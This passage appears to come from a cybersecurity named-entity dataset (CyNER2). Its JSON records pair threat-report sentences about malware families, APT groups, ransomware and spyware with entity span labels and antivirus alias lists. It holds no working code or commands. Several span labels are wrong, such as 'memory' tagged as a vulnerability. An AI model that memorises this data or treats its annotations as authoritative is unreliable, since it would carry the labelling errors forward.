41]], "SYSTEM: European Point of Sales POS vendor.": [[62, 97]]}, "info": {"id": "cyner2_train_001630", "source": "cyner2_train"}} {"text": "The Bergard Trojan and the C0d0so group that made it famous with the November 2014 watering hole attack via Forbes.com have received renewed attention recently, with other researchers potentially linking emerging tools and recent attacks to the group.", "spans": {"MALWARE: The Bergard Trojan": [[0, 18]], "THREAT_ACTOR: the C0d0so group": [[23, 39]], "ORGANIZATION: researchers": [[172, 183]], "MALWARE: tools": [[213, 218]], "THREAT_ACTOR: the group.": [[241, 251]]}, "info": {"id": "cyner2_train_001631", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.Mist.111104 Troj.PSW32.W.Mist.a!c Win32.Trojan.WisdomEyes.16070401.9500.9977 Trojan-PSW.Win32.Mist.a Trojan.Win32.Mist.dboecq Trojan.DownLoad3.33938 Trojan-PSW.Win32.Mist W32.Malware.Heur PWS:Win32/Steam.J Trojan-PSW.Win32.Mist.a TrojanPSW.Mist 
Win32.Trojan-qqpass.Qqrob.Ajli Trojan.PWS.Mist! W32/Mist.A!tr.pws Win32/Trojan.PSW.db7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001632", "source": "cyner2_train"}} {"text": "Recently, Palo Alto Networks Unit 42 reported on a new exploitation platform that we called DealersChoice in use by the Sofacy group AKA APT28, Fancy Bear, STRONTIUM, Pawn Storm, Sednit.", "spans": {"ORGANIZATION: Palo Alto Networks Unit 42": [[10, 36]], "VULNERABILITY: exploitation platform that": [[55, 81]], "THREAT_ACTOR: DealersChoice": [[92, 105]], "THREAT_ACTOR: Sofacy group": [[120, 132]], "THREAT_ACTOR: APT28, Fancy Bear, STRONTIUM, Pawn Storm, Sednit.": [[137, 186]]}, "info": {"id": "cyner2_train_001633", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Collti Adware.ShandaAdd!DlXR6+5TT0o WS.Reputation.1 TR/Collti.A.24 Heuristic.BehavesLike.Win32.ModifiedUPX.C Trojan:Win32/Collti.A Trojan.Win32.Collti Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001634", "source": "cyner2_train"}} {"text": "TrendMicro recently came across a variant of the BIFROSE malware that has been rewritten for UNIX and UNIX-like systems.", "spans": {"ORGANIZATION: TrendMicro": [[0, 10]], "MALWARE: BIFROSE malware": [[49, 64]], "SYSTEM: UNIX": [[93, 97]], "SYSTEM: UNIX-like systems.": [[102, 120]]}, "info": {"id": "cyner2_train_001637", "source": "cyner2_train"}} {"text": "A backdoor also known as: Banker/W32.Banbra.186368 Trojan/ProxyChanger.g Win32.Trojan.WisdomEyes.16070401.9500.9844 Trojan-Banker.Win32.Banbra.tnul Win32.Trojan-banker.Banbra.Wtxw Trojan-Downloader.Win32.Murlo W32/Trojan.IUVC-7922 TR/StealthProxy.B.11 Trojan[Downloader]/Win32.Banload Win32.Troj.Undef.kcloud Trojan-Banker.Win32.Banbra.tnul Trojan:Win32/StealthProxy.B Trojan/Win32.Scar.R17882 Trojan.ProxyChanger!31A84p0+A4o W32/ProxyChanger.NM!tr Trj/CI.A Win32/Trojan.Proxy.d23", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_001639", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.Aebot!O Backdoor.GTbot.Win32.124 Trojan/Aebot.k Win32.Backdoor.Aebot.f Win.Trojan.Sdbot-2505 Backdoor.Aebot Backdoor.Win32.GTbot.c Trojan.Win32.GTbot.craqxn TrojWare.Win32.Aebot.EF BackDoor.IRC.Sdbot.based BehavesLike.Win32.Ipamor.gz Backdoor/GTbot.bj Backdoor.Win32.GTbot.c Win32/Aebot.K Backdoor.Aebot!dwOGgEtXe1I Backdoor.Win32.Aebot.K W32/Aebot.K!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001641", "source": "cyner2_train"}} {"text": "Derkziel info stealer Steam, Opera, Yandex, ...", "spans": {"MALWARE: Derkziel": [[0, 8]], "SYSTEM: Steam, Opera, Yandex,": [[22, 43]]}, "info": {"id": "cyner2_train_001642", "source": "cyner2_train"}} {"text": "What are Google authorization tokens ? A Google authorization token is a way to access the Google account and the related services of a user .", "spans": {"ORGANIZATION: Google": [[9, 15], [41, 47], [91, 97]]}, "info": {"id": "cyner2_train_001643", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mdropper TROJ_ARTIEF.CR Exploit.MSWord.CVE-2010-3333.ci Exploit.Rtf.CVE-2010-3333.hzts Exploit.Rtf.based TROJ_ARTIEF.CR TrojanDropper.RTF.b NORMAL:Hack.Exploit.Script.CVE-2010-3333.a!1609827 Data/CVE20103333.A!exploit Luhe.Exploit.RTF.CVE-2010-3333.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001644", "source": "cyner2_train"}} {"text": "In December 2015, several researchers reported that websites hosting the Rig Exploit Kit were serving an updated version of Qbot.3 4 5 Then in January 2016, over 500 devices at a large public organisation wereinfected with Qbot.", "spans": {"ORGANIZATION: researchers": [[26, 37]], "MALWARE: the Rig Exploit Kit": [[69, 88]], "MALWARE: Qbot.3 4 5": [[124, 134]], "SYSTEM: devices": [[166, 173]], "ORGANIZATION: large public organisation": [[179, 204]], "MALWARE: Qbot.": [[223, 228]]}, "info": {"id": 
"cyner2_train_001646", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SpamlesEI1.Trojan Rootkit.KillAv.B Trojan/W32.Rootkit.3712.K Trojan.Kapa.A Rootkit.W32.Small.to6t Trojan/AutoRun.AntiAV.r Rootkit.KillAv.B RTKT_SMALL.SMB Hacktool.Rootkit Win32/SillyAutorun.DCA RTKT_SMALL.SMB Rootkit.KillAv.B Rootkit.Win32.Small.sfn Rootkit.KillAv.B Trojan.Win32.NtRootKit.chvyyx Rootkit.KillAv.B TrojWare.Win32.Rootkit.Small.AA Trojan.NtRootKit.10455 Trojan:Winnt/Kapa.A Trojan:WinNT/Kapa.A Rootkit.Win32.Small.sfn Backdoor/Win32.Rootkit.R1193 Rootkit.KillAv.B Trojan.Win32.KillAV.af Worm.Orbina!Ypp8YqYGicY Trojan.WinNT.Kapa RootKit.Win32.KillAV.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001648", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware03 Trojanspy.Banker.16710 Win32/Tnega.EcVXcGD Trojan.Win32.Small.csf Troj.W32.Small.mfSA Trojan.Starter.3499 Trojan.Small.Win32.24377 Trojan/Small.paq TR/Rogue.30781 Trojan/Win32.Small Trojan:Win32/Meicater.A!bit Trojan.Strictor.D240AB Trojan.Win32.Small.csf Trojan.Small Trojan.Small!+nCz0Wnah68 Trojan.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001649", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Mahato!O Backdoor.Bifrose.F8 Trojan/Mahato.caj Win32.Trojan.WisdomEyes.16070401.9500.9964 TROJ_CALYPS.SMUJ Win.Trojan.Mahato-1 Trojan.Win32.Mahato.caj Trojan.Win32.Mahato.ijlmo Trojan.Win32.Scar.118272[UPX] TrojWare.Win32.Mahato.A BehavesLike.Win32.Sytro.cc Trojan/Mahato.ob W32.Backdoor.Apocalypse Trojan/Win32.Mahato Win32.Troj.Scar.15.kcloud Trojan.Zusy.DAAC W32.W.AutoRun.lkXC Trojan.Win32.Mahato.caj Trojan:Win32/Lypsacop.A Trojan/Win32.Mahato.R2854 Backdoor.Bifrose Virus.Win32.Delf Trojan.Mahato", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001650", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Malware10 Trojan.Mauvaise.SL1 TROJ_NITOL.SMD 
Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/Trojan2.PAML TROJ_NITOL.SMD Win32.Trojan-DDoS.Yoddos.A Trojan-Dropper.Win32.Dinwod.wkn Trojan.Win32.Staser.demkhd Troj.Dropper.W32.Dinwod.toj0 TrojWare.Win32.Nitol.KA DDoS.Attack.384 Trojan.Staser.Win32.2253 BehavesLike.Win32.Downloader.nm Trojan.Win32.Yoddos W32/Trojan.QEFN-2077 Trojan/Staser.le TR/Dropper.cgytn Trojan-Dropper.Win32.Dinwod.wkn Trojan:Win32/Wepiall.A Backdoor/Win32.Farfli.R119148 Trojan.Staser Trj/CI.A Win32/Yoddos.BW Trojan.Win32.Staser.anbya W32/Yoddos.BW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001651", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.1167 O97M.Downloader.4967 VB:Trojan.Valyria.1167 VB:Trojan.Valyria.1167 Trojan.Ole2.Vbs-heuristic.druvzi VB:Trojan.Valyria.1167 VB:Trojan.Valyria.1167 HEUR.VBA.Trojan.e W97M.Downloader.GOX virus.office.qexvmc.1085", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001653", "source": "cyner2_train"}} {"text": "A backdoor targetting Linux also known as: Backdoor.Linux.Tsunami.A Linux.Backdoor.Kaiten ELF_KAITEN.SM HEUR:Backdoor.Linux.Tsunami.bh Trojan.Tsunami.exnldy Backdoor.Linux.Tsunami!c Linux.BackDoor.Tsunami.761 ELF_KAITEN.SM ELF/Backdoor.EWHJ- Backdoor.Linux.aego LINUX/Tsunami.bkdwv Trojan[Backdoor]/Linux.Tsunami.bh Trojan.Backdoor.Linux.Tsunami.1 HEUR:Backdoor.Linux.Tsunami.bh Backdoor.Linux.Tsunami.b Trojan.Linux.Tsunami ELF/Tsunami.NBV!tr Win32/Trojan.fba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001654", "source": "cyner2_train"}} {"text": "Recently we detected a more sophisticated technique that a handful of countries across Asia are actively using to infect systems with RATs. 
This new technique ensures that the payload/file remains in memory through its execution, never touching the disk in a de-encrypted state.", "spans": {"SYSTEM: infect systems": [[114, 128]], "MALWARE: RATs.": [[134, 139]], "MALWARE: payload/file": [[176, 188]], "VULNERABILITY: memory": [[200, 206]]}, "info": {"id": "cyner2_train_001656", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Cossta!O Trojan.Cossta Trojan.Win32.Cossta.vjk Trojan.Win32.Drop.dxlfgu Trojan.Win32.Cossta.49152 Trojan.KillFiles.18641 Trojan/Cossta.ett Trojan/Win32.Cossta Worm:Win32/Vobirue.A W32.W.AutoRun.l6mI Trojan.Win32.Cossta.vjk HEUR/Fakon.mwf Win32/VB.OPD", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001657", "source": "cyner2_train"}} {"text": "With this latest report, we have now identified at least 21 cases in Mexico of abusive, improper targeting with NSO Group's Pegasus spyware", "spans": {"THREAT_ACTOR: NSO Group's": [[112, 123]], "MALWARE: Pegasus spyware": [[124, 139]]}, "info": {"id": "cyner2_train_001658", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.FakeAlert.TK Rootkit.Win32.Clbd!O Trojan/Clbd.dt Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.FakeAlert.TK Trojan.FakeAlert.TK Trojan.Win32.Clbd.oyzd Trojan.Win32.Z.Clbd.68100 Trojan.FakeAlert.TK Trojan.FakeAlert.TK Rootkit.Clbd.Win32.6 BehavesLike.Win32.VirRansom.kc Trojan.Win32.Waledac Rootkit.Clbd.av Trojan.FakeAlert.TK TrojanDropper:Win32/Pasich.A Trojan/Win32.Bredlab.R17 Trojan.FakeAlert.TK MalwareScope.Worm.Nuwar-Glowa.1 Rootkit.Clbd!+/k5iv7h7q8 Win32/Trojan.df3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001660", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Veil.5 W32/Trojan.UYPJ-5875 Ruby/Rozena.H Trojan.Win32.Ruby.emhncx Trojan.SkypeSpam.11018 TR/AD.Rozena.uidpc Trojan.Win32.Z.Veil.654486.A Trojan.SkypeSpam! 
Trojan.Ruby.Rozena Win32/Trojan.34d", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001661", "source": "cyner2_train"}} {"text": "Apart from infecting systems with it, we also spotted instances where common lateral movement tools were detected around the same time they were actively compromising the endpoint with MajikPOS.", "spans": {"SYSTEM: infecting systems": [[11, 28]], "MALWARE: MajikPOS.": [[185, 194]]}, "info": {"id": "cyner2_train_001662", "source": "cyner2_train"}} {"text": "The malicious code only makes for a small part of the app, making it difficult to detect.", "spans": {}, "info": {"id": "cyner2_train_001663", "source": "cyner2_train"}} {"text": "A backdoor also known as: Android.Trojan.FakeInst.BD Android.Opfake.E Android.Trojan.FakeInst.BD AndroidOS/Opfake.AR ANDROIDOS_SMSUPDATE.C Andr.Trojan.Opfake-4 Android.Trojan.FakeInst.BD HEUR:Trojan-SMS.AndroidOS.Opfake.a A.H.Pay.ApuAte Trojan.Android.Opfake.emekxt Trojan:Android/Fakeinst.CG Android.SmsSend.2293 ANDROIDOS_SMSUPDATE.C AndroidOS/Opfake.AR Trojan/AndroidOS.r Trojan[SMS]/Android.Opfake Android.Troj.Opfake.b.kcloud Android.Trojan.FakeInst.BD HEUR:Trojan-SMS.AndroidOS.Opfake.a Android-Trojan/FakeInst.1b13 Trojan.AndroidOS.Opfake.A Trojan.Android.FakeInstall.p Trojan-SMS.AndroidOS.Opfake", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001665", "source": "cyner2_train"}} {"text": "They only compromise specific high-value targets and once inside the company networks, move laterally to hosts that can be monetized.", "spans": {"SYSTEM: company networks,": [[69, 86]], "SYSTEM: hosts": [[105, 110]]}, "info": {"id": "cyner2_train_001666", "source": "cyner2_train"}} {"text": "We've recently discussed Corebot malware and its possible ties to btcshop.cc, a site selling stolen data.", "spans": {"MALWARE: Corebot malware": [[25, 40]]}, "info": {"id": "cyner2_train_001669", "source": "cyner2_train"}} {"text": "The Makop ransomware gang is still using the same 
tools used in their first operations in 2020, according to a recent investigation by Lifars security team, which has identified four of the gang's tools.", "spans": {"THREAT_ACTOR: The Makop ransomware gang": [[0, 25]], "MALWARE: tools": [[50, 55]], "THREAT_ACTOR: operations": [[76, 86]], "ORGANIZATION: Lifars security team,": [[135, 156]], "ORGANIZATION: the gang's": [[186, 196]], "MALWARE: tools.": [[197, 203]]}, "info": {"id": "cyner2_train_001671", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9531 Win.Trojan.AutoIT-6333854-0 AutoIt/injector.E AutoIt/injector.E Win32/Injector.Autoit.DFJ Trojan.Win32.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001676", "source": "cyner2_train"}} {"text": "This file contained embedded macro code that executed a commonly observed PowerShell command to download and execute a file.", "spans": {"MALWARE: embedded macro code": [[20, 39]], "SYSTEM: PowerShell command": [[74, 92]]}, "info": {"id": "cyner2_train_001679", "source": "cyner2_train"}} {"text": "MONSOON is the name given to the Forcepoint Security Labs", "spans": {"ORGANIZATION: MONSOON": [[0, 7]], "ORGANIZATION: the Forcepoint Security Labs": [[29, 57]]}, "info": {"id": "cyner2_train_001680", "source": "cyner2_train"}} {"text": "Myanmar is a country currently engaged in an important political process.", "spans": {}, "info": {"id": "cyner2_train_001682", "source": "cyner2_train"}} {"text": "The attackers involved in these email campaigns leveraged a variety of distribution mechanisms to deliver the information stealing FormBook malware, including:", "spans": {"THREAT_ACTOR: The attackers": [[0, 13]], "THREAT_ACTOR: email campaigns": [[32, 47]], "MALWARE: FormBook malware,": [[131, 148]]}, "info": {"id": "cyner2_train_001684", "source": "cyner2_train"}} {"text": "CryptoWall is a type of malware known as ransomware, which encrypts a victim's files and subsequently demands payment in 
exchange for the decryption key.", "spans": {"MALWARE: CryptoWall": [[0, 10]], "MALWARE: malware": [[24, 31]], "MALWARE: ransomware,": [[41, 52]]}, "info": {"id": "cyner2_train_001685", "source": "cyner2_train"}} {"text": "A backdoor also known as: Exploit.Win32.MS04-028!O Trojan.Diztakun W32.W.Ridnu.ls5O Trojan/Exploit.MS04-028.g Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/HideinPic.A Win.Trojan.Ag-1 Trojan.Win32.Diztakun.xnd Exploit.Win32.MS04028.lhyh Trojan.MulDrop3.32325 Exploit.MS04.Win32.105 BehavesLike.Win32.Vilsel.qc Trojan-Banker.Win32.Bancos Exploit.MS04-028.h Trojan[Exploit]/Win32.MS04-028 Trojan:Win32/Greener.A Trojan.Win32.Diztakun.xnd Trojan/Win32.Xema.C6210 Exploit.MS04028 Trojan.Heur.dmHfrf5Ccil Win32/Greener.A Win32.Virus.Greener.Pdct Worm.Kilada.A W32/Greener.A!tr Win32/Trojan.cae", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001686", "source": "cyner2_train"}} {"text": "In fact, this concept is nothing novel – we already saw many ransomware families that can do the same.", "spans": {}, "info": {"id": "cyner2_train_001687", "source": "cyner2_train"}} {"text": "This malware has the capability to overwrite a victim host's master boot record MBR and all data files.", "spans": {"MALWARE: malware": [[5, 12]]}, "info": {"id": "cyner2_train_001688", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Barys.DD90F Trojan:Win32/Rozena.D!bit Trojan.PowerShell.Rozena", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001689", "source": "cyner2_train"}} {"text": "Pro PoS is simple-to-use PoS malware that is available for purchase, enabling multiple threat actors to easily take advantage of this malware to target businesses.", "spans": {"MALWARE: Pro PoS": [[0, 7]], "MALWARE: PoS malware": [[25, 36]], "THREAT_ACTOR: multiple threat actors": [[78, 100]], "MALWARE: malware": [[134, 141]], "ORGANIZATION: target businesses.": [[145, 163]]}, "info": {"id": "cyner2_train_001690", "source": 
"cyner2_train"}} {"text": "For many years, one of the go-to families of malware used by both less-skilled and advanced actors has been the Poison Ivy aka PIVY RAT.", "spans": {"MALWARE: malware": [[45, 52]], "THREAT_ACTOR: less-skilled": [[66, 78]], "THREAT_ACTOR: advanced actors": [[83, 98]], "MALWARE: Poison Ivy": [[112, 122]], "MALWARE: PIVY RAT.": [[127, 136]]}, "info": {"id": "cyner2_train_001693", "source": "cyner2_train"}} {"text": "Following discovery, we alerted our customers and began working with Microsoft through the responsible disclosure process.", "spans": {}, "info": {"id": "cyner2_train_001695", "source": "cyner2_train"}} {"text": "On July 8, 2015, Unit 42 used the AutoFocus Threat Intelligence service to locate and investigate activity consistent with a spear-phishing attack targeting the US Government.", "spans": {"ORGANIZATION: Unit 42": [[17, 24]], "ORGANIZATION: AutoFocus Threat Intelligence service": [[34, 71]], "ORGANIZATION: US Government.": [[161, 175]]}, "info": {"id": "cyner2_train_001696", "source": "cyner2_train"}} {"text": "A backdoor also known as: Banker/W32.Alreay.639100 TrojanSpy.Banker.SW4 Trojan.Banswift Win.Trojan.BBSwift-4 Trojan-Banker.Win32.Alreay.b Trojan.Win32.Alreay.eigudw Win32.Trojan-banker.Alreay.Edxl Trojan.Swifter.1 Trojan.Banker.Alreay.f W32/Alreay.ADAQ!tr Troj.Banker.W32!c Trojan-Banker.Win32.Alreay.b Trojan:Win32/Tokser.A Trojan/Win32.Alreay.C1768016 Spyware.Banker.Alreay TrojanBanker.Alreay Win32/Spy.Banker.ADAQ Trj/GdSda.A Win32/Trojan.c8b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001697", "source": "cyner2_train"}} {"text": "A backdoor also known as: Infostealer.Gampass Trojan.DownLoad1.59715 Trojan-Downloader.Win32.Adload!IK Trojan/Win32.Adload Trojan-Spy.Win32.Filka.ld Trojan-PSW.Gampass Trojan-Downloader.Win32.Adload Trj/Lineage.BZE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001698", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan/Clicker.BHO.ncs Win32.Trojan.WisdomEyes.16070401.9500.9639 Win32/TrojanClicker.BHO.NCS Win32.Trojan.Spnr.Pfjg TrojWare.Win32.TrojanClicker.BHO.NCS Dropper.BHO.Win32.500 TrojanDropper.BHO.pj TR/Rogue.kdv.655157 Trojan[Dropper]/Win32.BHO Trojan.Zusy.Elzob.D1C26 TrojanDropper:Win32/Hufysk.A Dropper/Win32.BHO.R25331 TrojanDropper.BHO Trojan-Dropper.Win32.Hufysk W32/TrojanClicker_BHO.NCS Trj/CI.A Win32/Trojan.a73", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001701", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Downloader.Msil.H Trojan-Downloader.Win32.FraudLoad!O Win32/SillyDl.YBL Win.Downloader.134626-1 Trojan.Downloader.Msil.H Trojan-Downloader.Win32.FraudLoad.iei Trojan.Downloader.Msil.H Trojan.Win32.A.Downloader.229376.FL Trojan.Downloader.Msil.H Win32.HLLW.Myscan.1 BehavesLike.Win32.BadFile.pm Trojan[Downloader]/Win32.FraudLoad TrojanDownloader:Win32/Hesto.A Trojan-Downloader.Win32.FraudLoad.iei Trojan.Downloader.Msil.H TrojanDownloader.FraudLoad Trojan.Downloader.Msil.H", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001703", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.TDSS!O Win32.Trojan.WisdomEyes.16070401.9500.9885 Trojan.Win32.Drop.dajhso Trojan.MulDrop5.32960 Trojan/PSW.LdPinch.adoe Backdoor:Win32/Nosrawec.A Trojan.Delf.279 Backdoor.W32.Beastdoor.l7a6 Trojan/Win32.Nosrawec.R198886 RiskWare.Tool.CK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001704", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.SasfisQKC.Fam.Trojan Trojan/W32.PornoBlocker.60928.F TrojanDropper.Bamital.I3 Trojan/PornoBlocker.hhu TROJ_BAMITAL.SM2 Win32.Trojan.Kryptik.ct TROJ_BAMITAL.SM2 Win.Trojan.Ransom-740 Trojan-Ransom.Win32.PornoBlocker.hts Trojan.Win32.PornoBlocker.bwvwe Trojan.Hottrend Trojan.PornoBlocker.Win32.1248 Trojan/PornoBlocker.axt TR/Qhost.60928 Trojan[Ransom]/Win32.PornoBlocker Trojan.VIZ.1 
Trojan:Win32/Bamital.I Trojan.SB.01742 Bck/Qbot.AO Win32/Bamital.FA Win32.Trojan.Pornoblocker.Lkxy Trojan.PornoBlocker!v14Do0CXdgA Win32/Trojan.3c3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001705", "source": "cyner2_train"}} {"text": "ATM malware is not new, back in 2013 and 2014 threats like Ploutus or PadPin Tyupkin were used to empty ATMs in Mexico, Russia and other countries, but SUCEFUL offers a new twist by targeting the cardholders.", "spans": {"MALWARE: ATM malware": [[0, 11]], "MALWARE: Ploutus": [[59, 66]], "MALWARE: PadPin Tyupkin": [[70, 84]], "SYSTEM: ATMs": [[104, 108]], "ORGANIZATION: cardholders.": [[196, 208]]}, "info": {"id": "cyner2_train_001707", "source": "cyner2_train"}} {"text": "As an active threat under development, we decided to take a closer look at this RAT to understand some of its inner workings and capabilities.", "spans": {"MALWARE: active threat": [[6, 19]], "MALWARE: RAT": [[80, 83]]}, "info": {"id": "cyner2_train_001709", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9980 Trojan.Win32.Zusy.rjrdd TrojWare.Win32.TrojanDownloader.Murlo.~JH2 Trojan.Sasfis.Win32.30609 Trojan/Sasfis.xqr TR/Zusy.3171.28 Trojan/Win32.Sasfis Trojan.Zusy.DC63 Backdoor:Win32/Usinec.A Trojan/Win32.Sasfis.C97816 Trojan.Sasfis Trojan.Sasfis!LKZhl2Eyglg Trojan.Win32.Sasfis", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001710", "source": "cyner2_train"}} {"text": "Although state-sponsored attacks against the United States by Chinese threat actors have decreased dramatically since the signing of the US-China Cyber Agreement in 2016, Proofpoint researchers have continued to observe advanced persistent threat APT activity associated with Chinese actors targeting other regions.", "spans": {"THREAT_ACTOR: Chinese threat actors": [[62, 83]], "ORGANIZATION: US-China Cyber Agreement in": [[137, 164]], "ORGANIZATION: Proofpoint researchers": [[171, 193]], 
"THREAT_ACTOR: advanced persistent threat APT": [[220, 250]], "THREAT_ACTOR: Chinese actors": [[276, 290]]}, "info": {"id": "cyner2_train_001711", "source": "cyner2_train"}} {"text": "Over the past year or so, we have seen numerous techniques and tactics employed by this campaign, such as the use of an iOS espionage app, and the inclusion of new targets like the White House.", "spans": {"MALWARE: campaign,": [[88, 97]], "MALWARE: iOS espionage app,": [[120, 138]], "ORGANIZATION: the White House.": [[177, 193]]}, "info": {"id": "cyner2_train_001714", "source": "cyner2_train"}} {"text": "Cknife is a Chinese cross-platform compatible Java web shell framework — that operates more like a RAT for web servers — based on China Chopper.", "spans": {"MALWARE: Cknife": [[0, 6]], "MALWARE: Chinese cross-platform compatible Java web shell framework": [[12, 70]], "MALWARE: RAT": [[99, 102]], "SYSTEM: web servers": [[107, 118]], "MALWARE: China Chopper.": [[130, 144]]}, "info": {"id": "cyner2_train_001715", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Menti.184320.T Trojan.Graftor.D557F Win32.Trojan.Farfli.ai Trojan.DownLoader6.3217 BehavesLike.Win32.BadFile.cm Trojan.Win32.MMM Trojan/Win32.Menti PWS:Win32/Quopax.A!dll Trojan.Win32.A.Menti.184320.YN BScope.Trojan.SvcHorse.01643 Backdoor.Win32.Gh0st.EB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001716", "source": "cyner2_train"}} {"text": "For the entry point, this Locky variant uses spam emails with .ZIP file attachments that contain WSF files.", "spans": {"MALWARE: Locky variant": [[26, 39]]}, "info": {"id": "cyner2_train_001717", "source": "cyner2_train"}} {"text": "In late August, WildFire Locker disappeared after the organizations behind NoMoreRansom.org were able to seize control of the ransomware s Command Control servers.", "spans": {"MALWARE: WildFire Locker": [[16, 31]], "ORGANIZATION: organizations": [[54, 67]], "MALWARE: ransomware": [[126, 136]]}, "info": 
{"id": "cyner2_train_001718", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojanspy.Smetsb.FC.4036 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.MSIL.Krypt.4 Trojan/Win32.ZBot.R155926 Trojan.InfoStealer.KL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001719", "source": "cyner2_train"}} {"text": "This version masquerades as CryptoWall.", "spans": {"MALWARE: CryptoWall.": [[28, 39]]}, "info": {"id": "cyner2_train_001720", "source": "cyner2_train"}} {"text": "Tick's most recent attacks have concentrated on the technology, aquatic engineering, and broadcasting sectors in Japan.", "spans": {"MALWARE: Tick's": [[0, 6]], "ORGANIZATION: the technology, aquatic engineering,": [[48, 84]], "ORGANIZATION: broadcasting sectors": [[89, 109]]}, "info": {"id": "cyner2_train_001722", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.OnionDuke W32/Trojan3.XZO Trojan.Cozer.B BKDR_COZER.LP Backdoor.Win32.MiniDuke.cb Trojan.Win32.AD.ekdqnf Win32.Backdoor.Miniduke.Lplm BackDoor.CozyDuke.49 BehavesLike.Win32.RansomwareLocky.gh W32/Trojan.QFCN-8527 Backdoor.MiniDuke.av TR/AD.OnionDuke.trltr Backdoor.Win32.MiniDuke.cb Backdoor.MiniDuke", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_001723", "source": "cyner2_train"}} {"text": "FIN4 is a financially motivated threat actor which has consistently targeted this population.", "spans": {"THREAT_ACTOR: FIN4": [[0, 4]], "THREAT_ACTOR: threat actor": [[32, 44]]}, "info": {"id": "cyner2_train_001724", "source": "cyner2_train"}} {"text": "The newly discovered campaign targets the Indian Ministry of Defense using malicious documents as lures", "spans": {"THREAT_ACTOR: campaign": [[21, 29]], "ORGANIZATION: the Indian Ministry of Defense": [[38, 68]]}, "info": {"id": "cyner2_train_001727", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Recyl Trojan.Injector.Win32.557110 Worm.Win32.Recyl.afr BehavesLike.Win32.Dropper.rc Worm.Recyl.v 
